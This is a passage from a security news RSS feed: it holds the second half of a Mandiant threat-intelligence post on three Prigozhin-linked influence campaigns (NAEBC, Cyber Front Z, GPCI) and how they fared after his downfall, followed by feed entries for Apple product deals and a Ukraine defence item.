<li>Following the June 2023 mutiny, the swift closure of Prigozhin’s overt influence arms such as his <a href="https://www.theguardian.com/world/2023/jul/05/putin-takes-on-yevgeny-prigozhin-business-empire" rel="noopener" target="_blank"><u>Patriot Group</u></a> demonstrated the Russian Government’s intent to publicly dismantle at least components of Prigozhin’s operations. Reports <a href="https://www.reuters.com/world/europe/prigozhin-controlled-russian-media-group-shuts-amid-mutiny-fallout-2023-07-02/" rel="noopener" target="_blank"><u>also indicated</u></a> that Prigozhin’s “troll factory” was likewise closed as a result. 
<ul>
<li>Given the well-established nature of the campaigns detailed in this report, we find it unlikely that they could have been overlooked or that formal or informal Russian Government enforcement measures would have been incapable of stopping them—specifically as regards to Russia-based operations. </li>
<li>We have traditionally prioritized externally focused Prigozhin-linked IO in our tracking and thus lack the visibility to formally assess potential differences in outcomes for domestic Russia focused operations. However, it is plausible that efforts to dismantle Prigozhin’s influence capabilities may have centered on domestically focused operations. </li>
</ul>
</li>
<li>Narratives recently promoted by each of these campaigns largely correspond with the campaigns’ established focuses; this also includes topical overlaps between campaigns’ promoted narratives on general pro-Russia topics and/or narratives that mutually promote Russian interests and those of Prigozhin’s foreign business ventures.
<ul>
<li>Prigozhin’s businesses often served as a mechanism for promoting Russian interests abroad. Also, Prigozhin’s business holdings often appeared to concurrently operate in a target region. For example, Prigozhin-linked IO activity targeted African nations while his Wagner PMC also operated in the region (Figure 2).</li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/life-after-death-prigozhin-fig2.max-1000x1000.png" alt="Cyber Front Z has consistently disseminated content promoting Prigozhin’s interests">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="muos3">Figure 2: Cyber Front Z has consistently disseminated content promoting Prigozhin’s interests. This includes content directly supporting Prigozhin and Wagner during and immediately after the June mutiny, as well as content promoting Wagner’s presence in Africa. These posts have been machine translated from Russian.</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Three Prigozhin-linked IO Campaigns</h2>
<p>Mandiant reviewed activity associated with assets attributed to the NAEBC, Cyber Front Z, and GPCI campaigns following the political downfall and death of Prigozhin. While our visibility into each campaign is neither equal nor complete, each displays at least continued activity showing how the campaigns and/or the auxiliary infrastructure leveraged to support them have endured. Additionally, each of these three campaigns represents one of a range of models leveraged for covert Prigozhin-linked IO (Figure 3).</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/life-after-death-prigozhin-fig3.max-1000x1000.png" alt="Prigozhin-linked IO activity has employed at least three different models for campaigns">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="vmq7r">Figure 3: Prigozhin-linked IO activity has employed at least three different models for campaigns</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li>NAEBC presents as a completely covertly managed campaign.</li>
<li>Cyber Front Z is an overt nominally third-party Russian organization established to obfuscate and administer IO activity.</li>
<li>GPCI is an independent, domestically-focused foreign organization with some reported financial links to Prigozhin. </li>
</ul>
<h3>Covertly Managed Campaign: NAEBC </h3>
<p>Since October 2020, Mandiant has tracked and reported on the NAEBC IO campaign, which has persistently attempted to influence right-leaning U.S. audiences on issues related to U.S. politics and elections, as well as significant geopolitical events. The campaign is named for the now-inaccessible inauthentic news site "Newsroom for American and European Based Citizens'' (NAEBC), which according to an October 2020 <a href="https://www.reuters.com/article/usa-election-russia-disinformation/exclusive-russian-operation-masqueraded-as-right-wing-news-site-to-target-u-s-voters-sources-idUSKBN26M5OP/" rel="noopener" target="_blank"><u>Reuters article</u></a> was attributed by a U.S. Federal Bureau of Investigation investigation as being run by individuals linked to the IRA. NAEBC has evolved and shifted its tactics over time. Its operators have continued to use established campaign infrastructure after repeated public exposure, including the repurposing of social media assets once used to backstop and promote the inauthentic NAEBC news site to form the core of an effort to promote content furthering the campaign’s objectives through coordinated and inauthentic means. </p>
<p>If leveraged to target upcoming U.S. elections, the NAEBC campaign may only be one component of pro-Russia activity collectively targeting the population. Historically, IO campaigns linked to Prigozhin and/or the IRA have targeted all sides of the political spectrum to advance broader foreign influence objectives to sow division. </p>
<ul>
<li>Some previously attributed campaign assets on alternative platforms continue to promote content targeting right-leaning U.S. audiences on a range of issues.</li>
<li>The campaign has a history of fluctuating its activity levels between key events such as U.S. elections. Its current levels appear to be reduced from those during the 2022 U.S. <a href="https://www.mandiant.com/resources/blog/information-operations-2022-midterm-elections" rel="noopener" target="_blank"><u>midterm elections</u></a>, when the campaign had a focused operation, but are similar to what was observed preceding Prigozhin’s downfall. </li>
<li>NAEBC personas recently promoted pro-Russia narratives appear consistent with past activity, including narratives targeting U.S. domestic politics and elections, the Russian invasion of Ukraine, and geopolitical developments, such as the Israel-Hamas conflict (Figure 4). </li>
<li>It is possible that the controversy surrounding Prigozhin has affected the campaign; however, given limitations in our current visibility and the identified consistencies in recent campaign activity, we are currently unable to assess to which degree this may be so.</li>
<li>NAEBC's ongoing activity may be an indicator that the campaign operators intend to leverage campaign assets in the upcoming U.S. election season—the campaign has<a href="https://www.mandiant.com/resources/blog/information-operations-2022-midterm-elections" rel="noopener" target="_blank"><u> previously mobilized</u></a> around such events—even if only as an attempt to bolster the perception that pro-Russia IO is persistently influencing the U.S. electorate.
<ul>
<li>In the 2022 midterm elections, the campaign launched their main operation closer to election day, thus it may be too early to assess this scenario. </li>
</ul>
</li>
<li>Historical activity linked to Prigozhin and/or the IRA show that their tactics often appear foremost intended to exacerbate existing divisions in society, often targeting both sides of the political spectrum. Accordingly, we highlight as context an example of related IO activity that occurred contemporaneous to NAEBC’s emergence in 2020, which illustrates how this dynamic can manifest. 
<ul>
<li>In August 2020, Mandiant identified and reported to customers a website named “Peace Data,” which promoted content that appeared curated to influence left-leaning audiences, including some content related to U.S. domestic political issues and the then-upcoming 2020 presidential election (Figure 5). </li>
<li>Subsequently, Meta <a href="https://about.fb.com/news/2020/09/august-2020-cib-report/" rel="noopener" target="_blank"><u>reported</u></a> publicly in September 2020 that it had removed a network of coordinated and inauthentic accounts promoting Peace Data—it attributed this activity as being run by individuals with links to the IRA. Shortly after public exposure, the Peace Data website posted a message indicating that it was ceasing operations. </li>
<li>The Peace Data comparison with NAEBC likewise provides an example of how even nominally similar IO campaigns can leverage different tactics to target subsets of the same populations. For example, Peace Data reportedly engaged in the paid solicitation of unwitting real individuals to write articles for dissemination.</li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/life-after-death-prigozhin-fig4.max-1000x1000.png" alt="Example post by NAEBC persona that disseminated content">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="vmq7r">Figure 4: Example post by NAEBC persona that disseminated content that promoted commentary from Putin regarding the Israel-Hamas conflict that positively framed Russia’s actions in Ukraine</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/life-after-death-prigozhin-fig5.max-1000x1000.png" alt="Example of article published in 2020 to the “Peace Data” domain">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="vmq7r">Figure 5: Example of article published in 2020 to the “Peace Data” domain, which promoted content on a range of issues including some pertaining to U.S. domestic politics and elections. Notably, its operators leveraged some different tactics than the NAEBC campaign, <a href="https://www.nbcnews.com/tech/tech-news/russian-internet-trolls-hired-u-s-journalists-push-their-news-n1239000">reportedly</a> including the paid soliciting of content from unwitting contributors</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3>“Third-Party” Front Organization: Cyber Front Z</h3>
<p>Cyber Front Z first emerged as a Russian-language pro-Russia Telegram channel (Russian: Кибер Фронт Z) in the days following Russia’s launch of its full scale invasion of Ukraine in late February 2022. We first<a href="https://www.mandiant.com/resources/blog/information-operations-surrounding-ukraine" rel="noopener" target="_blank"><u> publicly reported</u></a> on our tracking of Cyber Front Z in May 2022, noting its overt efforts to coordinate the promotion of invasion-related pro-Russia content and that Russian investigative reporting suggested it was linked to individuals from the IRA who were running a troll factory—Meta seemingly confirmed this in <a href="https://about.fb.com/wp-content/uploads/2022/08/Quarterly-Adversarial-Threat-Report-Q2-2022.pdf" rel="noopener" target="_blank"><u>public reporting</u></a> from August 2022. </p>
<p>In an August 2023 update to customers following Prigozhin’s death, we identified expansions in Cyber Front Z’s activity and several indicators that more clearly established Cyber Front Z’s IRA links and suggested the group had plans to expand operations leading up to Prigozhin’s mutiny. This activity has been significantly curtailed since then, though the Telegram channel has remained somewhat active and limited indicators suggest it may still be planning for expanded future activity. </p>
<ul>
<li>In Spring 2023, Prigozhin announced a new head of Cyber Front Z, a woman named Asiya Aminovna Sadrieva who we judge to be a former IRA employee. Prigozhin then directed Sadrieva to register Cyber Front Z as a public organization—business records show this was done in early June—suggesting plans for Cyber Front Z’s continued activity and growth leading up to the mutiny.
<ul>
<li>Throughout this time Cyber Front Z was posting job solicitations including for "activists…who are ready to defend their Motherland in the information field with the help of comments (VKontakte, Telegram)” (translated from Russian) (Figure 6). </li>
</ul>
</li>
<li>Cyber Front Z organized grassroots activity and in-person events, often focused on invasion related topics, that appeared to cease post-mutiny. However, in early December 2023, the group’s VKontakte (VK) page, where they traditionally promoted events, began posting about past events and implying considerations for future organizing (Figure 7).
<ul>
<li>The halting of in-person events indicates that Cyber Front Z was at minimum indirectly hampered in some of its activity by Prigozhin’s political fallout; its nascent reactivation on this front suggests such effects may not be final.</li>
<li>The grassroots activity organized under the Cyber Front Z brand demonstrates how the campaign, which has centered on promoting invasion-related messaging, dually maintained an element focused on domestic Russian populations. </li>
</ul>
</li>
<li>Cyber Front Z’s Telegram channel has remained operational throughout the process of Prigozhin’s undoing and since his death, though it appears less active and is now primarily focused on publishing and cross-promoting content related to developments in Ukraine and other domestic Russian and global developments.
<ul>
<li>Cyber Front Z’s Telegram channel continued to promote content supportive of Prigozhin and Wagner throughout the insurrection and since.</li>
<li>A New Year’s Eve post published to both the Cyber Front Z Telegram channel and VK page reflected on the group’s 2023 activity, including noting that it had organized “raids” on social media pages—likely describing what is known as “brigading”— spotlighting its efforts coordinating online activity as one of the group’s key accomplishments.</li>
<li>We currently lack the visibility to determine if and/or when the coordinated and inauthentic activity previously attributed to the group by Meta ceased. However, this Telegram channel has at least previously served as a component of that activity.</li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/life-after-death-prigozhin-fig6.max-1000x1000.png" alt="Cyber Front Z posted job solicitations in the period preceding Prigozhin’s June mutiny">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="37793">Figure 6: Cyber Front Z posted job solicitations in the period preceding Prigozhin’s June mutiny (these posts have been machine translated from Russian)</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/life-after-death-prigozhin-fig7.max-1000x1000.png" alt="advertisement and post">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="37793">Figure 7: An advertisement for an in-person Cyber Front Z event held at the group's headquarters (left); a December 2023 post to Cyber Front Z VK page announcing interest in resuming in-person events (machine translated from Russian), the text of the included graphic reads “We are with you again!” (right)</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3>Likely Paid Partnership: GPCI</h3>
<p>In August 2023, before Prigozhin’s death, we identified, and subsequently reported to customers, recently registered infrastructure and newly created social media accounts that we attributed with high confidence to <em>Groupe Panafricain pour le Commerce et l'Investissement</em> (GPCI), a Togo-based political marketing consultancy <a href="https://about.fb.com/news/2023/05/metas-adversarial-threat-report-first-quarter-2023/" rel="noopener" target="_blank"><u>recently outed</u></a> by Meta for its involvement in continued information operations targeting domestic audiences primarily in the Sahel region of Africa. According to <a href="https://cyber.fsi.stanford.edu/io/news/car-takedown-may-2021" rel="noopener" target="_blank"><u>multiple</u></a> <a href="https://alleyesonwagner.org/2023/02/05/burkina-faso-under-influence/" rel="noopener" target="_blank"><u>sources</u></a>, GPCI and its founder Harouna Douamba allegedly maintain ties to the now-deceased Yevgeniy Prigozhin.</p>
<ul>
<li>The identified websites, which we assessed to be inauthentic, present as media entities targeting different countries in Africa’s Sahel region. Additionally, we identified a number of Facebook pages and accounts leveraged to seed and disseminate content—some pages correspond directly to media outlets attributed to GPCI. 
<ul>
<li>Facebook pages published content and then regularly shared that content across different Facebook groups. </li>
<li>Additionally, the suspected inauthentic Facebook accounts, which most commonly presented as regionally based individuals, inorganically boosted engagement with the GPCI-associated Facebook pages (Figure 8). </li>
</ul>
</li>
<li>Messaging promoted by this network has included narratives related to political dynamics and events within the Sahel region, such as criticizing France’s regional presence.</li>
<li>According to <a href="https://advantage.mandiant.com/reports/23-00039724#:~:text=May%202023%2C%20Meta-,acknowledged,-renewed%20attempts%20by" rel="noopener" target="_blank"><u>public reporting</u></a> by Meta, GPCI is linked to Aimons Notre Afrique (ANA), a non-governmental organization (NGO) based in the Central African Republic (CAR) that has previously been exposed for supporting information operations. Notably, separate <a href="https://alleyesonwagner.org/2023/02/05/burkina-faso-under-influence/" rel="noopener" target="_blank"><u>public reporting</u></a> has indicated that GPCI/ANA, as well as its founder Harouna Douamba, maintain various ties to Prigozhin. These links include alleged financial connections to a company called Lobaye Invest, which the <a href="https://home.treasury.gov/news/press-releases/sm1133" rel="noopener" target="_blank"><u>U.S. Department of Treasury</u></a> previously sanctioned as controlled by Prigozhin and used to consolidate PMC Wagner’s operations in the Central African Republic; and claims that Douamba managed Russian propaganda out of the “Office of Information and Communication in the Central African Republic,” <a href="https://www.lemonde.fr/en/le-monde-africa/article/2023/08/06/the-faces-of-russia-s-influence-across-the-african-continent_6082513_124.html" rel="noopener" target="_blank"><u>a center of influence established by Wagner within the Central African presidency</u></a>.</li>
<li>GPCI exhibited an upward trend in its activity throughout the period of Prigozhin’s downfall and subsequent death, during a time when some other Prigozhin-linked IO activity sets appeared to be at least hampered by the political fallout surrounding him. One possible explanation for this is that GPCI represents a third model for how Prigozhin managed his IO activity. 
<ul>
<li>In addition to being located outside Russia, and thus potentially beyond the reach and care of the Russian Government, GPCI is an organization local to the target region under local management. It is possible that GPCI has conducted influence activity in the pay of Prigozhin-linked entities and also is engaged in separate activity reflecting local initiatives that in instances also has alignments with Russian interests.</li>
<li>We lack the visibility that would confirm this possible dynamic. However, if true, such a paid-local partnership model could explain the resurgence of GPCI activity during this tumultuous period. Likewise, its purported history of partnering with Prigozhin would suggest that it could be leveraged by surviving Prigozhin legacy organizations or other Russian actors in future.</li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/life-after-death-prigozhin-fig8.max-1000x1000.png" alt="Suspected inauthentic account attributed to GPCI">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="37793">Figure 8: Suspected inauthentic account attributed to GPCI engaged in concerted sharing of campaign content while using #Abonnez_Vous_a_la_Page (machine translation: Subscribe to the page) for audience building</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Promoted Messaging</h2>
<p>The NAEBC, Cyber Front Z, and GPCI campaigns’ recently promoted narratives largely appear to be consistent with past activity. Each campaign has a distinct regional focus that directly corresponds with the majority of its promoted content. However, the campaigns have also promoted messaging targeting other countries or issues, including issues relevant to Russian strategic interests and/or Prigozhin’s diverse business investments. What follows are some examples of narratives promoted by these campaigns organized by some of the regions they have variously targeted. </p>
<h3>The U.S. and Europe</h3>
<p>NAEBC’s central narrative focus remains related to U.S. politics and elections. This includes narratives promoting issues that appear aligned with the Republican Party, specifically supporting former U.S. President Donald Trump and criticizing the current administration and the Democratic Party (Figure 9).</p>
<ul>
<li>Promoted content has supported Trump’s candidacy in the 2024 U.S. presidential election, and it has questioned the 2020 U.S. presidential election results.</li>
<li>Other narratives promoted controversial narratives, such as alleging that the congressional committee established to investigate the events of Jan. 6 was engaged in a cover-up, or promoting narratives related to allegations against President Biden's son Hunter.</li>
<li>Narratives that appeared to criticize the Administration include those that framed Biden as unfit for leadership and those that implied he and other officials are corrupt and ignore the problems facing the American people.</li>
<li>In some instances, NAEBC promoted content more broadly criticizing major institutions, such as NATO or the UN, suggesting they should be dismantled. Such narratives appear to generally support an idea that a Western-led global order should be broken up in favor of a multipolar world where Russia has a larger share of influence.</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/life-after-death-prigozhin-fig9.max-1000x1000.png" alt="Example NAEBC content that promoted narratives related to U.S. elections (top) and criticizing NATO (bottom)">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="0o9tl">Figure 9: Example NAEBC content that promoted narratives related to U.S. elections (top) and criticizing NATO (bottom)</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>Russian-language content published to the Cyber Front Z Telegram channel regularly criticizes “the West” and individual Western countries.</p>
<ul>
<li>Often this is in the context of the Russian invasion of Ukraine, though Western countries also are targeted on unrelated issues. This includes content that is critical of U.S. and European leaders. </li>
<li>Additional narratives critique what are labeled as “Western values,” including the repeated promotion of anti-LGBTQ+ content. </li>
</ul>
<h3>Ukraine and Russia</h3>
<p>Cyber Front Z’s core focus remains the promotion of pro-Russia content related to the Russian invasion of Ukraine, though it does comment on other topics (Figure 10).</p>
<ul>
<li>Promoted narratives support the Russian war effort, including explicit support for Wagner; they also include anti-Ukraine messaging, criticizing Ukraine’s war effort and leadership, as well as disinformation narratives and pro-Russia talking points like falsely calling Ukrainians “nazis” and the war a process of “denazification.” </li>
<li>Additional content has promoted Russia and Russian President Vladimir Putin more generally, such as praising Putin for his purported candor at media events.</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/life-after-death-prigozhin-fig10.max-1000x1000.png" alt="Example Cyber Front Z content promoting narratives related to the Russian invasion of Ukraine">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="0o9tl">Figure 10: Example Cyber Front Z content promoting narratives related to the Russian invasion of Ukraine (these posts have been machine translated from Russian)</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>NAEBC assets have incorporated invasion-related narratives as another core component of its recent activity. Such anti-Ukraine narratives have consistently appeared intended to diminish support among its target audience for foreign aid sent to Ukraine (Figure 11).</p>
<ul>
<li>Promoted narratives criticize U.S. support for Ukraine, alleging the U.S. Government deprioritizes U.S. domestic issues as a result, and they frame Ukraine’s war effort as futile and its leadership as corrupt. </li>
<li>A more limited number of narratives promoted Vladimir Putin, including those that framed him as a force for good working to counter Western values that are presented as detrimental to those living under them.</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/life-after-death-prigozhin-fig11.max-1000x1000.png" alt="Example NAEBC content that promoted narratives related to the Russian invasion of Ukraine">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="0o9tl">Figure 11: Example NAEBC content that promoted narratives related to the Russian invasion of Ukraine</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3>Africa </h3>
<p>GPCI primarily promotes content targeting countries in the Sahel region of Africa, most frequently focusing on domestic audiences in Burkina Faso though sometimes pivoting to target other regional events and issues (Figure 12). </p>
<ul>
<li>Messaging has frequently praised and supported Captain Ibrahim Traoré (the military leader and transitional president of Burkina Faso) and the role of Burkina Faso's Defense and Security Forces (FDS) and the Patriotic Movement for Safeguard and Restoration (MPSR).</li>
<li>Some narratives praised strengthened Russo-Burkinabe relations, such as touting Traoré's involvement in the July 27, 2023, Russia-Africa Summit where he stated that "Russia is a part of the family for Africa." Additional narratives praised Wagner’s involvement throughout the region. </li>
<li>Promoted narratives also included topics such as the July 2023 coup d'état in Niger. Such messaging most frequently supported the coup leader General Abdourahamane Tiani; and it was critical of the role of France in the region and regional bodies like the Economic Community of West African States (ECOWAS).</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/life-after-death-prigozhin-fig12.max-1000x1000.png" alt="Content promoted by GPCI criticizing ECOWAS (left); and content promoted by in-network GPCI accounts promoting pro-Russia messaging (right)">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="0o9tl">Figure 12: Content promoted by GPCI criticizing ECOWAS (left); and content promoted by in-network GPCI accounts promoting pro-Russia messaging (right)</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>Cyber Front Z has also promoted Africa-related narratives via its Telegram channel. Interestingly, in the interlude between the Prigozhin-led mutiny and his death, it promoted content supporting Wagner’s role in several African countries, including content presenting Wagner as important to regional security and defending Russia's interests abroad.</p>
<h2>Outlook and Implications</h2>
<p>Throughout his long tenure as a funder of IO activity, Yevgeniy Prigozhin and his affiliated entities not only established a range of campaigns targeting different geographies but also leveraged multiple models for managing and executing IO as is exemplified by the case studies detailed in this blog post. We currently lack the visibility necessary to assess the total implications of what the differences between Prigozhin-linked IO campaigns may mean for their long-term survivability. Key indicators that we are looking for moving forward include those that might shed light on their future management: indicators suggesting a central connection between any surviving campaigns, or those suggesting that the various Prigozhin-linked activity sets are linked to different actors and thus they have been fragmented under new operators. While the outcome of this process remains unknown, analysis of these three campaigns highlights the potential that this and potentially other IO infrastructure established by Prigozhin-linked initiatives will remain available for pro-Russia threat activity at least in the medium term.</p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AirPods Max 2 plunge to $499 at Amazon, the lowest price ever]]></title>
<description><![CDATA[Despite being released only two months ago, AirPods Max 2 are on sale for $499, which is the lowest price to date. And score delivery as early as today.Grab AirPods Max 2 at the lowest price ever - Image credit: AppleYou can pick up AirPods Max 2 at a $50 discount at Amazon today when you opt for...]]></description>
<link>https://tsecurity.de/de/3573026/ios-mac-os/airpods-max-2-plunge-to-499-at-amazon-the-lowest-price-ever/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3573026/ios-mac-os/airpods-max-2-plunge-to-499-at-amazon-the-lowest-price-ever/</guid>
<pubDate>Thu, 04 Jun 2026 17:06:00 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Despite being released only two months ago, AirPods Max 2 are on sale for $499, which is the lowest price to date. And score delivery as early as today.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67839-142972-airpods-max-2-499-deal-xl.jpg" alt="AirPods Max 2 headphones with bold text stating 499 lowest price ever on a dark background with colorful soundwave graphic" height="720"><br><span>Grab AirPods Max 2 at the lowest price ever - Image credit: Apple</span></div><br>You can pick up AirPods Max 2 <strong><a href="https://www.amazon.com/dp/B0GSS4SGZR?th=1&amp;tag=apinsiderdeals-20" rel="nofollow" target="_blank">at a $50 discount</a></strong> at Amazon today when you opt for the Midnight or Starlight colors. This reflects the lowest price seen to date since the over-ear headphones were announced in late March 2026. <a href="https://www.amazon.com/amazonprime?tag=apinsiderdeals-20" rel="nofollow" target="_blank">Amazon Prime members</a> can also get delivery as early as today, depending on your shipping address.<br><br><a href="https://www.amazon.com/dp/B0GSS4SGZR?th=1&amp;tag=apinsiderdeals-20" rel="nofollow" class="deal-highlight">Buy AirPods Max 2 for $499</a><br><br><br> <a href="https://appleinsider.com/articles/26/06/04/airpods-max-2-plunge-to-499-at-amazon-the-lowest-price-ever?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244534?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple's 15-inch MacBook Air M5 plunges to $1,099 in price war]]></title>
<description><![CDATA[The best 15-inch MacBook Air deal has returned as Prime Day 2026 nears, delivering a $200 price drop on Apple's newest model equipped with an M5 chip.Grab the lowest price ever on the new M5 15-inch MacBook Air - Image credit: AppleYou can grab the $1,099 price at Amazon and B&H Photo in the Midn...]]></description>
<link>https://tsecurity.de/de/3570193/ios-mac-os/apples-15-inch-macbook-air-m5-plunges-to-1099-in-price-war/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570193/ios-mac-os/apples-15-inch-macbook-air-m5-plunges-to-1099-in-price-war/</guid>
<pubDate>Wed, 03 Jun 2026 17:55:12 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The best 15-inch MacBook Air deal has returned as Prime Day 2026 nears, delivering a $200 price drop on Apple's newest model equipped with an M5 chip.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67822-142932-macbook-air-15-inch-m5-1099-deal-xl.jpg" alt="Colorful image showing a 15inch MacBook Air M5 laptop with blue abstract wallpaper on screen, overlaid bold white text: 15 AIR M5 $1,099, on a gradient rainbow background" height="720"><br><span>Grab the lowest price ever on the new M5 15-inch MacBook Air - Image credit: Apple</span></div><br>You can grab the $1,099 price at <a href="https://www.amazon.com/dp/B0GR114BV7?th=1&amp;tag=apinsiderdeals-20" rel="nofollow" target="_blank">Amazon</a> and <a href="https://www.bhphotovideo.com/c/product/1956924-REG/apple_mdvh4ll_a_15_macbook_air_m5.html/BI/1717/KBID/2301/SID/da-maca-15in-m5-1099-060226" rel="nofollow" target="_blank">B&amp;H Photo</a> in the Midnight finish specifically, with B&amp;H stating limited supply is available at the reduced price. The standard 15-inch MacBook Air model has a 10-core CPU and 10-core GPU, along with 16GB of unified memory, and 512GB of storage.<br><br><ul><li>Buy Apple's 15-inch MacBook Air (16GB RAM, 512GB SSD) for $1,099 <strong><a href="https://www.amazon.com/dp/B0GR114BV7?th=1&amp;tag=apinsiderdeals-20" rel="nofollow" target="_blank">at Amazon</a></strong></li><li>Buy Apple's 15-inch MacBook Air (16GB RAM, 512GB SSD) for $1,099 <strong><a href="https://www.bhphotovideo.com/c/product/1956924-REG/apple_mdvh4ll_a_15_macbook_air_m5.html/BI/1717/KBID/2301/SID/da-maca-15in-m5-1099-060226" rel="nofollow" target="_blank">at B&amp;H</a></strong><br><br><br> <a href="https://appleinsider.com/articles/26/06/03/apples-15-inch-macbook-air-m5-plunges-to-1099-in-price-war?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244522?urm_source=rss">Discuss on our Forums</a></li></ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thanks To Robots, Ukraine Is Now Talking About Winning, Not Just Surviving]]></title>
<description><![CDATA[fjo3 shares a report from Defense One: A small but growing number of European officials and analysts are saying what four years ago was unthinkable: Ukraine isn't just surviving its grueling war with Russia, it is in some ways thriving and may even be on a path to victory. This isn't yet captured...]]></description>
<link>https://tsecurity.de/de/3569315/it-security-nachrichten/thanks-to-robots-ukraine-is-now-talking-about-winning-not-just-surviving/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569315/it-security-nachrichten/thanks-to-robots-ukraine-is-now-talking-about-winning-not-just-surviving/</guid>
<pubDate>Wed, 03 Jun 2026 13:23:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
